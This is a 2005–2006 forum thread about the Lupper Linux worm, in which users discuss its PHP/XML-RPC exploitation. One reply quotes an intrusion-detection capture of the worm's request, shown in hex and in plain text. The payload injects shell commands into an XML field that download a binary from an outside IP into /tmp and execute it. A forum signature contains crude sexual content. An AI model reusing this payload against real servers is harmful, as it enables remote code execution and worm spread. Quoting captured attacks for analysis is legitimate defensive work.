Author Topic: Lupper the Linux Worm!  (Read 4421 times)

0 Members and 1 Guest are viewing this topic.

Offline zorm

  • Hero Member
  • *****
  • Posts: 591
    • View Profile
    • Zorm's Page
Lupper the Linux Worm!
« on: November 07, 2005, 08:36:04 pm »
http://vil.nai.com/vil/content/v_136821.htm

Kind of neat. Too bad its exploiting PHP/CGI.
"Frustra fit per plura quod potest fieri per pauciora"
- William of Ockham

Offline Ergot

  • 吴立峰 ^_^ !
  • x86
  • Hero Member
  • *****
  • Posts: 3724
  • I steal bandwidth. p_o
    • View Profile
Re: Lupper the Linux Worm!
« Reply #1 on: November 07, 2005, 10:54:59 pm »
I saw that, found that while looking for exploits... I'm pretty sure it doesn't affect me :D
Who gives a damn? I fuck sheep all the time.
And yes, male both ends.  There are a couple lesbians that need a two-ended dildo...My router just refuses to wear a strap-on.
(05:55:03) JoE ThE oDD: omfg good job i got a boner thinkin bout them chinese bitches
(17:54:15) Sidoh: I love cosmetology

Offline RoMi

  • x86
  • Hero Member
  • *****
  • Posts: 502
  • gg no re
    • View Profile
Re: Lupper the Linux Worm!
« Reply #2 on: November 28, 2005, 08:32:04 pm »
Snort picked it up for me.  Atleast I'm pretty sure it did.

Code: [Select]
length = 410

000 : 50 4F 53 54 20 2F 78 6D 6C 72 70 63 2E 70 68 70   POST /xmlrpc.php
010 : 20 48 54 54 50 2F 31 2E 31 0A 48 6F 73 74 3A 20    HTTP/1.1.Host:
020 : 32 34 2E 33 34 2E 32 38 2E 36 32 0A 55 73 65 72   24.*.*.*.User
030 : 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F   -Agent: Mozilla/
040 : 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 3B   4.0 (compatible;
050 : 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64 6F    MSIE 6.0; Windo
060 : 77 73 20 4E 54 20 35 2E 31 3B 29 0A 43 6F 6E 74   ws NT 5.1;).Cont
070 : 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 78   ent-Type: text/x
080 : 6D 6C 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74   ml.Content-Lengt
090 : 68 3A 32 36 39 0A 0A 3C 3F 78 6D 6C 20 76 65 72   h:269..<?xml ver
0a0 : 73 69 6F 6E 3D 22 31 2E 30 22 3F 3E 3C 6D 65 74   sion="1.0"?><met
0b0 : 68 6F 64 43 61 6C 6C 3E 3C 6D 65 74 68 6F 64 4E   hodCall><methodN
0c0 : 61 6D 65 3E 74 65 73 74 2E 6D 65 74 68 6F 64 3C   ame>test.method<
0d0 : 2F 6D 65 74 68 6F 64 4E 61 6D 65 3E 3C 70 61 72   /methodName><par
0e0 : 61 6D 73 3E 3C 70 61 72 61 6D 3E 3C 76 61 6C 75   ams><param><valu
0f0 : 65 3E 3C 6E 61 6D 65 3E 27 2C 27 27 29 29 3B 65   e><name>',''));e
100 : 63 68 6F 20 27 5F 62 65 67 69 6E 5F 27 3B 65 63   cho '_begin_';ec
110 : 68 6F 20 60 63 64 20 2F 74 6D 70 3B 77 67 65 74   ho `cd /tmp;wget
120 : 20 32 34 2E 32 32 34 2E 31 37 34 2E 31 38 2F 6C    24.224.*.*/l
130 : 69 73 74 65 6E 3B 63 68 6D 6F 64 20 2B 78 20 6C   isten;chmod +x l
140 : 69 73 74 65 6E 3B 2E 2F 6C 69 73 74 65 6E 20 20   isten;./listen 
150 : 20 20 20 20 20 20 20 60 3B 65 63 68 6F 20 27 5F          `;echo '_
160 : 65 6E 64 5F 27 3B 65 78 69 74 3B 2F 2A 3C 2F 6E   end_';exit;/*</n
170 : 61 6D 65 3E 3C 2F 76 61 6C 75 65 3E 3C 2F 70 61   ame></value></pa
180 : 72 61 6D 3E 3C 2F 70 61 72 61 6D 73 3E 3C 2F 6D   ram></params></m
190 : 65 74 68 6F 64 43 61 6C 6C 3E                     ethodCall>

Plain display:

Code: [Select]
POST /xmlrpc.php HTTP/1.1
Host: 24.*.*.*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
Content-Length:269

<?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_';echo `cd /tmp;wget 24.224.*.*/listen;chmod +x listen;./listen         `;echo '_end_';exit;/*</name></value></param></params></methodCall>

Look's so far so good though as far as not getting infected.  Looked in /tmp and can't see listen.  So far it's hit about 200 times.
« Last Edit: November 28, 2005, 08:36:26 pm by RoMi »
-RoMi

Offline mc0

  • Newbie
  • *
  • Posts: 8
    • View Profile
Re: Lupper the Linux Worm!
« Reply #3 on: February 28, 2006, 12:00:44 am »

Offline iago

  • Leader
  • Administrator
  • Hero Member
  • *****
  • Posts: 17914
  • Fnord.
    • View Profile
    • SkullSecurity
Re: Lupper the Linux Worm!
« Reply #4 on: February 28, 2006, 08:48:06 am »
http://vil.nai.com/vil/content/v_136821.htm

Kind of neat. Too bad its exploiting PHP/CGI.

why too bad?

Because it isn't really exploiting Linux, technically, it's exploiting PHP. 

Offline mc0

  • Newbie
  • *
  • Posts: 8
    • View Profile
Re: Lupper the Linux Worm!
« Reply #5 on: February 28, 2006, 10:54:53 pm »
Yes .. I'd say that's good.  There aren't many remote exploits that can target nix itself.